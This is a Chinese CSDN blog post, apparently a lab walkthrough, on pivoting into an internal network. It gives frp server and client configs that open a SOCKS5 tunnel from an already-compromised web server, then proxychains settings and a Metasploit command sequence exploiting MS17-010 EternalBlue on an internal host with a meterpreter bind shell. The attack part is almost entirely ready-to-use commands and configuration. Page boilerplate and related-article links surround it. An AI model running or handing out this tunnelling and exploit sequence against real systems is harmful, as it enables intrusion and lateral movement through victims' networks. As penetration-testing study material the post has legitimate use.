frp 内网穿透

最新推荐文章于 2024-08-09 09:21:14 发布
最新推荐文章于 2024-08-09 09:21:14 发布
阅读量235 收藏 4
点赞数 1
分类专栏: 内网基础 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49714982/article/details/137121297
版权
本文介绍了如何在公网服务器上配置frps-cmy.ini和内网服务器上运行frpc-cfrpc.ini,以实现socks5代理。随后展示了如何在Kali系统中使用proxychains4和Metasploit执行针对内网MS17-010EternalBlue漏洞的攻击。
摘要由CSDN通过智能技术生成

一、公网服务器运行frps -c my.ini

my.ini文件代码

[common]

bind_port = 7000  #公网服务器开启的监听端口

二、在已经拿到shell的内网服务器1,即内网的web服务器运行   frpc -c frpc.ini

frpc.ini文件代码

[common]

server_addr = 192.168.23.134 #公网服务器ip

server_port = 7000 #公网服务器开启的监听端口

[socks5]

type = tcp

remote_port = 9000 #远程端口

plugin = socks5   #协议名,确定为socks5

三、本机进行sock5代理,ip为公网服务器ip,端口为frpc my.ini中的remote_port,即远程端口

即可直接输入内网IP进行访问

四、kali代理并攻击

1、proxy sock5代理 修改/etc/proxychains4.conf中的[ProxyList内容]

sock服务    公网服务器ip   remote_port端口

2、扫描到永恒之蓝漏洞后,启动代理后的msf , 输入命令proxychains msfconsole,对内网主机2进行ms17-010进行攻击

msf6->search ms17-010

msf6->use exploit/windows/smb/ms17_010_eternalblue

msf6-> set payload windows/x64/meterpreter/bind_tcp    #由于内网主机2不出网,所以使用正向连接

msf6->set rhost 192.168.48.10                         # 设置内网主机2的ip地址

msf6->run

GET SHELL!!!!

login_upset
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FRP内网穿透
weixin_45541397的博客
03-24 1763
是一个专注于内网穿透的高性能的反向代理应用,可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网;只需要通过在具有公网 IP 的节点上部署 frp 服务端,可以轻松地将内网服务穿透到公网,同时提供诸多专业的功能特性,这包括:客户端服务端通信支持 TCP、QUIC、KCP 以及 Websocket 等多种协议采用 TCP 连接流式复用,在单个连接间承载更多请求,节省连接建立时间,降低请求延迟代理组间的负载均衡端口复用,多个服务通过同一个服务端端口暴露。
frp内网穿透
weixin_51885039的博客
05-31 1006
内网穿透方式
frp内网穿透搭建
qq_54060277的博客
07-31 880
Linux服务器搭建服务端,本地电脑搭建客户端实现内网穿透
Frp内网穿透
weixin_45213577的博客
09-24 1万+
Frp内网穿透内网穿透从本质上来讲也是端口映射,两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机,该情况多用于没有公网 IP 的情况下使用; ​ frp是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http, https等协议类型,可以将内网服务以安全、便捷的方式通过具有公网
frp内网穿透https
u014644574的博客
12-15 5649
frp内网穿透https
FRP 内网穿透下载配置
qq_42184753的博客
04-19 1939
FRP 内网穿透下载配置Frp服务的建造下载:修改配置文件frps.ini(服务端)配置文件解释说明:frpc.ini(客户端)配置文件解释说明:启动服务配置启动:创建server端服务脚本:(centos6)创建客户端服务脚本:公网服务器端:CentOS 6 防火墙配置文件位置CentOS 7 防火墙配置文件位置联系我 Frp服务的建造 搭建FRP很简单,关键的步骤只有三步: 1,获取FRP文件; 2,设置FRP配置文件; 3,启动FRP服务。 下载: 下载地址:https : //github.com/
frp内网穿透window版本,只支持windows系统
04-27
**frp内网穿透原理与应用** FRP(Fast Reverse Proxy)是一款轻量级的内网穿透工具,由Google员工“k8s-gubernator”开发。它主要用于帮助那些部署在内网或没有公网IP的服务器提供对外服务的能力。FRP的工作原理...
frp内网穿透工具 v0.54.0.zip
03-21
**frp内网穿透工具 v0.54.0.zip** 是一个包含了最新版本的Fast Reverse Proxy(简称frp)的压缩包。frp是一款强大的内网穿透工具,由Golang编写,允许用户在内网环境下,通过一个公开的服务器访问内网服务,实现了...
frp内网穿透客户端服务
11-20
【标题】:“frp内网穿透客户端服务” 【正文】: frp(Frondend Reverse Proxy)是一款轻量级、高性能的内网穿透工具,由Golang编写,旨在帮助那些处于内网或防火墙后的服务器提供对外的服务。通过frp,用户可以在...
frp内网穿透工具,附自动拉起脚本
10-24
frp内网穿透工具,附frp服务端、客户端自动拉起脚本。 支持TCP,UDP,HTTP,HTTPS等协议类型。 适用情况:实现内网服务通过端口映射的方式暴露在公网环境里。要求:有一台有公网IP的服务器。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1430
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 910
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 527
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1130
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
某赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞复现(XVE-2024-19611)
0xSec
08-08 697
某赛通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 206
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
数据跨境传输的安全合规风险如何规避?获取免费解决方案白皮书
文件数据安全交换
08-07 331
在全球化的背景下,企业进行有 效的资源整合,学习海外市场的先进技术和管理经验,寻找新的增长点,实现业务的多元化和 可持续发展,不仅有利于开辟新市场,更有助于巩固和增强企业在全球中的地位。应用风险:跨境数据的承载介质多样、呈现形态各异、应用广泛,数据所在国的政策和法律存 在差异,这可能导致数据所有和使用者权限模糊,数据应用开发存在被滥用的风险。自然灾害(如火灾、水灾、地震等)和事故(如电力故障、设备故障等)可能导致数据的物理 损失,使数据的完整性和可用性遭到破坏,数据失去使用价值。2、数据攻击窃取风险。
frp内网穿透内网linux
10-07
在linux系统上进行frp内网穿透的步骤如下: 1. 在linux系统上下载并解压frp文件,可以使用以下命令: ``` wget https://github.com/fatedier/frp/releases/download/v0.42.0/frp_0.42.0_linux_amd64.tar.gz tar ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值